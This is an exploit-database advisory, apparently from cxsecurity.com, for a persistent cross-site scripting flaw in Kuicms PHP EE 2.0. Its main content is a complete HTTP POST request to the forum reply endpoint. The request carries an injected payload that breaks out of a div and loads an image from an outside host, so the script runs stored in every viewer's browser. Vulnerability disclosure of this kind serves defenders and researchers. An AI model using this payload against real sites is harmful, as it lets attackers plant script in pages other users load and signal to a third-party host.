Kuicms PHP EE 2.0 Cross Site Scripting

2020.05.28
Credit: CBIITMC
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Kuicms Php EE 2.0 - Persistent Cross-Site Scripting # Date: 2020-05-27 # Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd. # Vendor Homepage: https://kuicms.com # Software Link: https://kuicms.com/kuicms.zip # Version: Kuicms Php EE 2.0 # Tested on: Windows # CVE : N/A Vulnerable Request: POST /web/?c=bbs&a=reply&id=1 HTTP/1.1 Host: 172.16.166.137 Content-Length: 56 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://172.16.166.137 Referer: http://172.16.166.137/web/?m=bbsshow&id=1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=vpj3jduhoqlfieqhcnlilck2s6 Connection: close content=</div>test<img src=//xsshs.cn/8jhh/xss.jpg><div>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top